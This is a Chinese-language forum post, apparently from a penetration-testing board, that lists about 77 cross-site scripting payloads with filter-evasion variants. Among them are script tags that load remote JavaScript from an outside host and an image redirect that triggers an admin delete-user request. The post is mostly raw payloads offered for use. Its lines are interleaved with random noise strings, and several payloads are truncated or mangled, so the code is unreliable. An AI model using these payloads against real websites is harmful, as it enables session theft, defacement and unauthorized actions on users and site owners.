中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

作者: admin    时间: 2013-4-19 19:22
标题: XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。( C- A+ V- t4 P7 l, V2 i7 `! N5 C
(1)普通的XSS JavaScript注入. r4 k$ ~& I# |/ E7 E
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ p3 h+ [' D3 f9 [+ c% b! C/ f3 F
(2)IMG标签XSS使用JavaScript命令! |1 r$ y) r! a4 F' D6 w
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 I8 P! K6 j+ Z+ I5 i2 I% e' ~(3)IMG标签无分号无引号
; E  A$ a7 l. p; Q5 U<IMG SRC=javascript:alert(‘XSS’)>
$ y$ Q6 V( Y! w: s5 J  T6 v(4)IMG标签大小写不敏感- b9 z+ P/ Z5 Q3 I( V
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>' G$ k  O3 q6 X
(5)HTML编码(必须有分号). v- {7 L/ X6 k% c! i# u# S: R
<IMG SRC=javascript:alert(“XSS”)>3 {9 I2 `- i' C! |% E
(6)修正缺陷IMG标签
7 D& ?6 a8 d* n5 t, T& k6 L<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
. {# P7 S+ [7 k1 O
2 I9 h: h6 D( A- N) O( F
) m/ J: n. a6 }1 Y(7)formCharCode标签(计算器)/ `5 o3 k' A; T- V' j# d, g
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
) I6 c7 o' I) y  Y, Q; Z(8)UTF-8的Unicode编码(计算器)
, [# P1 {5 u5 P- F9 ]<IMG SRC=jav..省略..S')>
1 P9 f( E. u6 u4 k4 Q(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
5 i1 B, ?* u' C<IMG SRC=jav..省略..S')>
& U9 a7 N6 j% |3 Z0 e8 E(10)十六进制编码也是没有分号(计算器), ?0 d( y2 V7 D8 T
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
* F  t5 n$ X/ k' W' o9 H(11)嵌入式标签,将Javascript分开
+ n2 x( r7 x( ^<IMG SRC=”jav ascript:alert(‘XSS’);”>
( u1 O" o) y- I. {* O& s(12)嵌入式编码标签,将Javascript分开; d" Q' W$ `) [( }) [
<IMG SRC=”jav ascript:alert(‘XSS’);”>& s# z8 A8 {1 b3 n1 C1 ?: u
(13)嵌入式换行符( e4 y& R+ J# y0 r0 g$ U1 U
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 x- w2 w; w" E5 F
(14)嵌入式回车# ~1 Z: W/ ?) {& B. z8 ~& s- n
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ H7 d. A; a! {" u$ S(15)嵌入式多行注入JavaScript,这是XSS极端的例子6 h" i7 |( x1 ^1 E+ p
<IMG SRC=”javascript:alert(‘XSS‘)”>( X, z0 S0 Z5 A" r
(16)解决限制字符(要求同页面)6 H  m) \* ]3 R" D: v+ C' ?
<script>z=’document.’</script>& j- H0 @& E" W! p
<script>z=z+’write(“‘</script>( y$ w8 L8 o$ F+ B0 P' N' d
<script>z=z+’<script’</script>
( B! i6 B. K* C. m! m<script>z=z+’ src=ht’</script>2 w8 E, R$ a- S* Z) n4 H1 O$ u
<script>z=z+’tp://ww’</script>1 h& ~/ c8 z3 L/ Y
<script>z=z+’w.shell’</script>* h) j3 p8 K7 y% m3 ^% R8 s
<script>z=z+’.net/1.’</script>
, u/ l2 Q, _0 ^/ f( J<script>z=z+’js></sc’</script>
# {" Q" f2 p9 f* a- D0 C$ I<script>z=z+’ript>”)’</script>
/ \$ F3 K( E. y. c, W' `8 d<script>eval_r(z)</script>4 R1 U5 C0 D; M4 m# d
(17)空字符12-7-1 T00LS - Powered by Discuz! Board" w4 h  \1 U" G3 C
https://www.t00ls.net/viewthread ... table&tid=15267 2/6$ t% L. e# y( i! r9 A& V2 ?
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out) G% C3 h) ]3 T# M6 F3 P
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用4 c8 U( Q9 x, Q$ P
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out2 X$ E2 {9 F9 n& M6 A( U. h
(19)Spaces和meta前的IMG标签, |3 p- N" F* ?4 A# [) C4 b
<IMG SRC=” javascript:alert(‘XSS’);”>
: P# H( V/ L) O9 _! @& K(20)Non-alpha-non-digit XSS( m4 b% E6 i6 H) j* f* B
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>; z" [* r' q; U3 Q( `. C5 C6 Q
(21)Non-alpha-non-digit XSS to 2) H6 N: O# ?. |1 S3 E; w
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
9 d% G# b: Q) i9 n* U(22)Non-alpha-non-digit XSS to 3
  J, M1 _/ K" I5 t5 K<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
: I- C* P8 _0 @+ G(23)双开括号
; U3 n  ~7 |) Q( Z: R" r<<SCRIPT>alert(“XSS”);//<</SCRIPT>& N' c. n$ o& E5 ?5 d; G1 x% O
(24)无结束脚本标记(仅火狐等浏览器)
/ E: I8 J) a6 K& S<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
& g0 \9 R- j* [0 o(25)无结束脚本标记2
; C( Z) n# Y  h8 R$ w* f<SCRIPT SRC=//3w.org/XSS/xss.js>5 E4 k$ y( f. t* y; I4 c
(26)半开的HTML/JavaScript XSS
' r7 R5 E7 ?6 f5 D<IMG SRC=”javascript:alert(‘XSS’)”0 _0 ]$ V3 y- T6 V
(27)双开角括号
7 u" q* T. v! ~7 l0 ?4 ]! \; h<iframe src=http://3w.org/XSS.html <6 I3 x( T' q8 j; m+ R) @
(28)无单引号 双引号 分号
$ _% X) u  m8 A<SCRIPT>a=/XSS/
( w% }2 B. J3 J* X" balert(a.source)</SCRIPT>
2 {% O8 V! L6 }9 N0 k(29)换码过滤的JavaScript
  `, \3 L0 t, d5 D7 s; b\”;alert(‘XSS’);//
- a3 |. e9 k4 P. }6 s(30)结束Title标签# t+ z- o+ w  V" _" F( U
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>" S9 b6 y* U0 [
(31)Input Image/ K! I/ P( ?/ g  t5 w4 R
<INPUT SRC=”javascript:alert(‘XSS’);”>
/ n: {) t4 c$ g% e* }(32)BODY Image( p) \: h# I" ^9 U# x
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>+ X  m1 F9 Z: l) y+ U
(33)BODY标签
+ R: o# X/ j# Q& B<BODY(‘XSS’)>0 Y, P+ @2 z, l- ~
(34)IMG Dynsrc9 K/ X; s. O% e- K
<IMG DYNSRC=”javascript:alert(‘XSS’)”>  r" l3 P0 J( b5 Z; y
(35)IMG Lowsrc, r; l6 x, n9 m; l1 l3 f6 E
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
1 m% W4 s% m* N" W6 ~5 V(36)BGSOUND
* X* }$ y( S( G" B+ c<BGSOUND SRC=”javascript:alert(‘XSS’);”>) c1 B6 {' m/ V2 ?5 {* x7 g4 B7 a& ]
(37)STYLE sheet" s: D' q' G+ n# U/ ~; Z! h
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>! ^* [+ U/ m$ M5 A  M
(38)远程样式表- T8 l8 u/ ~/ ~6 Q
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
# @. q7 A, X% |(39)List-style-image(列表式)
$ c, R9 p; @, ?+ n<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS* J) X# K+ }: B# ]- W
(40)IMG VBscript
$ J; {$ |$ M$ Z# M1 i# ]' S<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS1 k8 P& U: t- Y; J
(41)META链接url3 t  d$ \6 V% \! r7 |

9 l4 O7 U" @* m3 n+ k+ X/ _) Y
0 J# _& I* v& x7 @8 M<META HTTP-EQUIV=”refresh” CONTENT=”0;, P& E& ?" W* P  |" U
URL=http://;URL=javascript:alert(‘XSS’);”>
2 A" H8 q! k( d) j1 @. ?8 m! H  U(42)Iframe7 `' r, \* c+ s8 j
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
% X* `3 E8 q/ S(43)Frame) s% [1 s) D2 I
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
3 j' ^; ~" l! t' }8 y/ Nhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6# d1 o2 i- u* w6 z9 v
(44)Table8 W0 ^) F. }; Z, U/ _+ k5 ?" ^4 f
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
0 e  v6 }: `- S! I8 n(45)TD2 T9 K( w$ q: ~, u9 p
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>; k" |/ I7 i0 `; O2 F. S
(46)DIV background-image
2 c) x7 s# G/ a0 O4 j4 [<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>7 J, }- M+ l. |3 Z: Q6 H3 s0 a/ w: }
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-6 k/ Y0 E7 N4 ^2 K: Q9 S
8&13&12288&65279)
% k" g4 q6 a1 T- E; }3 Y7 {% S" \<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>: K  f2 C  T0 f# C
(48)DIV expression; M) U& q: a% b5 \! Q
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>" R3 w; h7 e( P
(49)STYLE属性分拆表达- t4 q  h2 R7 P+ p/ R7 G* ~
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>$ T8 j5 f3 _# D2 h+ S% ?$ o' V4 K" L
(50)匿名STYLE(组成:开角号和一个字母开头)2 E: `2 R/ x9 \) e( M4 F/ u
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>4 @5 h6 z0 Y& ]$ Q0 t* u
(51)STYLE background-image
7 e/ j; t; @, F5 |1 u& w, u; \+ s2 w<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A0 C! {1 {: P2 S7 o0 H/ K
CLASS=XSS></A>% @7 x9 \% J& T
(52)IMG STYLE方式* P, q5 e; r/ A+ g. e$ Y  }3 w. }( a& p
exppression(alert(“XSS”))’>, R0 f) ^' }1 C. ^' X
(53)STYLE background! l7 H4 t6 t/ U9 b/ k" W8 ]
<STYLE><STYLE
8 k% u& d* c/ T6 Qtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>, N  q$ C) ]% {: P' s
(54)BASE
; x# U: d$ a/ B<BASE HREF=”javascript:alert(‘XSS’);//”>2 \/ K, C+ R2 ?6 K! C; W
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
, e# h# M& _/ T8 r& N<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
: T0 Q' t4 J; v& Q(56)在flash中使用ActionScrpt可以混进你XSS的代码# ]. X* P$ M0 K: F2 [! G
a=”get”;
1 c1 y: ~6 P& B" ?7 l( n: mb=”URL(\”";; K; {+ I: U! S, Y6 V7 ?
c=”javascript:”;
& D# M9 |$ ?, D, ]! s5 \9 w- i2 s+ ed=”alert(‘XSS’);\”)”;6 l& ?, r- k; q* y
eval_r(a+b+c+d);
0 H% B; L# s+ e$ O(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
5 l) N" \9 E8 r<HTML xmlns:xss>& Y" J! J0 i7 E" D
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>5 s, @2 [+ d% b3 q4 @
<xss:xss>XSS</xss:xss>8 }! R# }# U7 u- C; v3 i, E! n: H
</HTML>: k0 Z# ]+ Z8 K% m+ D4 H
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
9 h1 e7 `& I/ I<SCRIPT SRC=””></SCRIPT>
4 h# I/ B% M/ @(59)IMG嵌入式命令,可执行任意命令
+ B  n8 b- _( `. m& O/ f* ^<IMG SRC=”http://www.XXX.com/a.php?a=b”>
. q* r9 t, y6 n7 \9 |. K& p(60)IMG嵌入式命令(a.jpg在同服务器)
3 G4 s! Y5 P7 D8 @$ ~Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser% E# a3 t+ T/ R/ `2 o6 E2 n* a$ h
(61)绕符号过滤
+ E9 n8 Q) n; z3 R% i$ I<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
- E) ?5 R  h0 g: ^1 C(62)& V- o$ }# N+ e+ Q& B
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>& l8 j( q1 a/ p2 W5 H. j7 a& G* _
(63)" c2 _( e; ]9 ?$ p
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
) E% A7 r5 x$ Y. K(64)8 e1 J- J" R0 H/ v/ p+ ?8 u
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
1 V8 x% |2 |5 [(65)
# W% x7 s: O; }# Y/ a2 z) v<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>; R0 ~' y4 a  ?- [0 H) j  E7 t
(66)12-7-1 T00LS - Powered by Discuz! Board' q9 n, n9 ~; w5 Y; H
https://www.t00ls.net/viewthread ... table&tid=15267 4/6, d$ i) X* u/ I& a& m
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
. K5 l- V* r7 I$ Y% X  j5 k2 W6 G$ a(67)' k( X0 @* d7 v8 p8 v' j
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>7 X. {: r$ N2 L$ P* [7 }! j
</SCRIPT>6 \3 K/ h' H3 w9 j* [
(68)URL绕行, d6 @1 I- U% Y1 z$ a3 h
<A HREF=”http://127.0.0.1/”>XSS</A>  P" `9 |( I, p: c
(69)URL编码
- R7 X6 o+ _7 e1 Q3 K<A HREF=”http://3w.org”>XSS</A>% u$ B7 S, G, t0 D# G
(70)IP十进制; F0 p, j5 t7 u" @' L9 D& Z" |( |
<A HREF=”http://3232235521″>XSS</A>
8 B, E% [# O/ j0 I(71)IP十六进制+ T$ x, u% z" \- w  c
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>' P, R! S8 e; N
(72)IP八进制
. H& {" D& \" i: ]0 v$ r6 w<A HREF=”http://0300.0250.0000.0001″>XSS</A>
/ j, M) G1 b* A/ K(73)混合编码$ \. d4 s+ Y5 l: D) s% F
<A HREF=”h6 f) ?6 R& ^& f5 p( V9 Q" e6 l9 |
tt p://6 6.000146.0×7.147/”">XSS</A>
, C2 r2 a/ |; K(74)节省[http:]
$ ?. I* A9 U) }+ c. V<A HREF=”//www.google.com/”>XSS</A>
( r+ P5 r" E% m! _% T  i(75)节省[www]
' V' Z4 u( |) N<A HREF=”http://google.com/”>XSS</A>
9 \! o- i  Z8 A6 B3 J: `9 {% C(76)绝对点绝对DNS
/ m' `8 v9 r8 ^6 `+ o! `( O: c<A HREF=”http://www.google.com./”>XSS</A>, J/ S8 {' R* Z3 h& Q8 O) K; j! ?; N
(77)javascript链接
7 ]  P2 |. i1 {<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>$ k- S+ G" N. e  a# o
/ [$ u2 b6 z" k# W% t! v6 n1 G
原文地址:http://fuzzexp.org/u/0day/?p=14
' V; z" n8 J7 I3 T
$ c! @; i0 d' I! i+ y& d( _




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2